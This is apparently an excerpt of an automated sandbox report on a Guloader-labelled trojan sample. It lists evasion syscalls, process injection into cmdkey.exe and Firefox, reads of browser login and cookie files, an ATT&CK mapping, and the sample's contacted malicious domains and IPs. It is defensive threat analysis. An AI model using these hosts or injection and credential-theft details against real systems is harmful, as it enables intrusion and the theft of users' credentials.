        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392270D mov eax, dword ptr fs:[00000030h]3_2_3392270D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392270D mov eax, dword ptr fs:[00000030h]3_2_3392270D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33929723 mov eax, dword ptr fs:[00000030h]3_2_33929723
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393A750 mov eax, dword ptr fs:[00000030h]3_2_3393A750
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33922755 mov eax, dword ptr fs:[00000030h]3_2_33922755
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33922755 mov eax, dword ptr fs:[00000030h]3_2_33922755
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33922755 mov eax, dword ptr fs:[00000030h]3_2_33922755
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33922755 mov ecx, dword ptr fs:[00000030h]3_2_33922755
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33922755 mov eax, dword ptr fs:[00000030h]3_2_33922755
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33922755 mov eax, dword ptr fs:[00000030h]3_2_33922755
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339AE750 mov eax, dword ptr fs:[00000030h]3_2_339AE750
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33933740 mov eax, dword ptr fs:[00000030h]3_2_33933740
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF75B mov eax, dword ptr fs:[00000030h]3_2_338FF75B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF75B mov eax, dword ptr fs:[00000030h]3_2_338FF75B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF75B mov eax, dword ptr fs:[00000030h]3_2_338FF75B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF75B mov eax, dword ptr fs:[00000030h]3_2_338FF75B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF75B mov eax, dword ptr fs:[00000030h]3_2_338FF75B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF75B mov eax, dword ptr fs:[00000030h]3_2_338FF75B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF75B mov eax, dword ptr fs:[00000030h]3_2_338FF75B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF75B mov eax, dword ptr fs:[00000030h]3_2_338FF75B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338FF75B mov eax, dword ptr fs:[00000030h]3_2_338FF75B
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393174A mov eax, dword ptr fs:[00000030h]3_2_3393174A
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33930774 mov eax, dword ptr fs:[00000030h]3_2_33930774
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33904779 mov eax, dword ptr fs:[00000030h]3_2_33904779
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33904779 mov eax, dword ptr fs:[00000030h]3_2_33904779
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33912760 mov ecx, dword ptr fs:[00000030h]3_2_33912760
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941763 mov eax, dword ptr fs:[00000030h]3_2_33941763
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941763 mov eax, dword ptr fs:[00000030h]3_2_33941763
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941763 mov eax, dword ptr fs:[00000030h]3_2_33941763
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941763 mov eax, dword ptr fs:[00000030h]3_2_33941763
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941763 mov eax, dword ptr fs:[00000030h]3_2_33941763
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33941763 mov eax, dword ptr fs:[00000030h]3_2_33941763
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33908690 mov eax, dword ptr fs:[00000030h]3_2_33908690
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3398C691 mov eax, dword ptr fs:[00000030h]3_2_3398C691
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397D69D mov eax, dword ptr fs:[00000030h]3_2_3397D69D
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33910680 mov eax, dword ptr fs:[00000030h]3_2_33910680
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BF68C mov eax, dword ptr fs:[00000030h]3_2_339BF68C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C86A8 mov eax, dword ptr fs:[00000030h]3_2_339C86A8
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339C86A8 mov eax, dword ptr fs:[00000030h]3_2_339C86A8
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392D6D0 mov eax, dword ptr fs:[00000030h]3_2_3392D6D0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339A86C2 mov eax, dword ptr fs:[00000030h]3_2_339A86C2
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339CA6C0 mov eax, dword ptr fs:[00000030h]3_2_339CA6C0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339006CF mov eax, dword ptr fs:[00000030h]3_2_339006CF
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397C6F2 mov eax, dword ptr fs:[00000030h]3_2_3397C6F2
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3397C6F2 mov eax, dword ptr fs:[00000030h]3_2_3397C6F2
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F96E0 mov eax, dword ptr fs:[00000030h]3_2_338F96E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_338F96E0 mov eax, dword ptr fs:[00000030h]3_2_338F96E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3390C6E0 mov eax, dword ptr fs:[00000030h]3_2_3390C6E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339056E0 mov eax, dword ptr fs:[00000030h]3_2_339056E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339056E0 mov eax, dword ptr fs:[00000030h]3_2_339056E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339056E0 mov eax, dword ptr fs:[00000030h]3_2_339056E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339266E0 mov eax, dword ptr fs:[00000030h]3_2_339266E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339266E0 mov eax, dword ptr fs:[00000030h]3_2_339266E0
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33993608 mov eax, dword ptr fs:[00000030h]3_2_33993608
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33993608 mov eax, dword ptr fs:[00000030h]3_2_33993608
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33993608 mov eax, dword ptr fs:[00000030h]3_2_33993608
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33993608 mov eax, dword ptr fs:[00000030h]3_2_33993608
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33993608 mov eax, dword ptr fs:[00000030h]3_2_33993608
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33993608 mov eax, dword ptr fs:[00000030h]3_2_33993608
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392D600 mov eax, dword ptr fs:[00000030h]3_2_3392D600
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3392D600 mov eax, dword ptr fs:[00000030h]3_2_3392D600
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339BF607 mov eax, dword ptr fs:[00000030h]3_2_339BF607
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393360F mov eax, dword ptr fs:[00000030h]3_2_3393360F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_339D4600 mov eax, dword ptr fs:[00000030h]3_2_339D4600
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33900630 mov eax, dword ptr fs:[00000030h]3_2_33900630
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33930630 mov eax, dword ptr fs:[00000030h]3_2_33930630
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33988633 mov esi, dword ptr fs:[00000030h]3_2_33988633
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33988633 mov eax, dword ptr fs:[00000030h]3_2_33988633
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_33988633 mov eax, dword ptr fs:[00000030h]3_2_33988633
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393F63F mov eax, dword ptr fs:[00000030h]3_2_3393F63F
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exeCode function: 3_2_3393F63F mov eax, dword ptr fs:[00000030h]3_2_3393F63F

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtNotifyChangeKey: Direct from: 0x773F3B4C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtWriteVirtualMemory: Direct from: 0x773F2D5C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtMapViewOfSection: Direct from: 0x773F2C3C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtAllocateVirtualMemory: Direct from: 0x773F2B1C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtResumeThread: Direct from: 0x773F35CC
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtReadFile: Direct from: 0x773F29FC
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtQuerySystemInformation: Direct from: 0x773F2D1C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtProtectVirtualMemory: Direct from: 0x773E7A4E
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtOpenFile: Direct from: 0x773F2CEC
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtAllocateVirtualMemory: Direct from: 0x773F3BBC
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtQueryInformationToken: Direct from: 0x773F2BCC
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtReadVirtualMemory: Direct from: 0x773F2DAC
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtSetInformationProcess: Direct from: 0x773F2B7C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtQueryAttributesFile: Direct from: 0x773F2D8C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtQueryVolumeInformationFile: Direct from: 0x773F2E4C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtDeviceIoControlFile: Direct from: 0x773F2A0C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtQuerySystemInformation: Direct from: 0x773F47EC
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtAllocateVirtualMemory: Direct from: 0x773F2B0C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtOpenSection: Direct from: 0x773F2D2C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtCreateFile: Direct from: 0x773F2F0C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtDelayExecution: Direct from: 0x773F2CFC
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtOpenKeyEx: Direct from: 0x773F2ABC
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtSetInformationThread: Direct from: 0x773E6319
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtQueryInformationProcess: Direct from: 0x773F2B46
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtResumeThread: Direct from: 0x773F2EDC
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtCreateUserProcess: Direct from: 0x773F363C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtProtectVirtualMemory: Direct from: 0x773F2EBC
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtWriteVirtualMemory: Direct from: 0x773F482C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtAllocateVirtualMemory: Direct from: 0x773F480C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtClose: Direct from: 0x773F2A8C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtCreateKey: Direct from: 0x773F2B8C
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe NtSetInformationThread: Direct from: 0x773F2A6C
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Section loaded: NULL target: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Section loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe protection: read write
        Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\cmdkey.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cmdkey.exe Thread register set: target process: 2136
        Source: C:\Windows\SysWOW64\cmdkey.exe Thread APC queued: target process: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Process created: C:\Users\user\Desktop\ImBm40hNZ2.exe "C:\Users\user\Desktop\ImBm40hNZ2.exe"
        Source: C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
        Source: C:\Windows\SysWOW64\cmdkey.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: aypAdCUEzlG.exe, 00000004.00000000.17123246060.0000000001CC0000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000002.21524491333.0000000001CC1000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21525493268.0000000001871000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
        Source: aypAdCUEzlG.exe, 00000004.00000000.17123246060.0000000001CC0000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000002.21524491333.0000000001CC1000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21525493268.0000000001871000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
        Source: aypAdCUEzlG.exe, 00000004.00000000.17123246060.0000000001CC0000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000002.21524491333.0000000001CC1000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21525493268.0000000001871000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
        Source: aypAdCUEzlG.exe, 00000004.00000000.17123246060.0000000001CC0000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000004.00000002.21524491333.0000000001CC1000.00000002.00000001.00040000.00000000.sdmp, aypAdCUEzlG.exe, 00000006.00000002.21525493268.0000000001871000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Code function: 0_2_00405BB3 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 0_2_00405BB3

        Stealing of Sensitive Information

        Source: Yara match File source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\cmdkey.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\cmdkey.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
        Source: C:\Users\user\Desktop\ImBm40hNZ2.exe Directory queried: number of queries: 1001

        Remote Access Functionality

        Source: Yara match File source: 00000005.00000002.21525642665.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.17223859670.00000000335C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.21525426014.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.17224990189.0000000033C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.21525140110.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
        Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
        Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
        Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
        Privilege Escalation: Process Injection (312); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
        Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (2); Process Injection (312); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1)
        Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
        Discovery: Security Software Discovery (121); Virtualization/Sandbox Evasion (2); Process Discovery (2); Application Window Discovery (1); File and Directory Discovery (13); System Information Discovery (14); Remote System Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
        Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture
        Command and Control: Encrypted Channel (11); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (5); Fallback Channels; Multiband Communication; Commonly Used Port
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
        Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
        [Behavior Graph ID: 1529843, Sample: ImBm40hNZ2.exe, Startdate: 09/10/2024, Architecture: WINDOWS, Score: 100]

        Source | Detection | Scanner | Label | Link
        ImBm40hNZ2.exe | 39% | ReversingLabs | Win32.Trojan.Guloader |
        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\nsy1C7B.tmp\System.dll | 0% | ReversingLabs | |
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        www.itemfilterhub.shop
        104.21.50.202
        truetrue
          unknown
          www.ayypromo.shop
          176.57.64.102
          truetrue
            unknown
            www.hypepgbet.online
            82.112.244.92
            truetrue
              unknown
              www.bullbord.top
              203.161.46.205
              truetrue
                unknown
                www.meetfactory.biz
                72.14.178.174
                truetrue
                  unknown
                  www.home-check.shop
                  185.230.15.3
                  truetrue
                    unknown
                    www.magicface.shop
                    13.248.169.48
                    truetrue
                      unknown
                      shops.myshopify.com
                      23.227.38.74
                      truetrue
                        unknown
                        natroredirect.natrocdn.com
                        85.159.66.93
                        truetrue
                          unknown
                          7ddw.top
                          154.23.184.207
                          truetrue
                            unknown
                            asa-malukuutara.com
                            103.247.8.53
                            truetrue
                              unknown
                              www.cachsoicautdtc.best
                              172.67.191.241
                              truetrue
                                unknown
                                groupriam.com
                                199.103.62.205
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                                            unknown
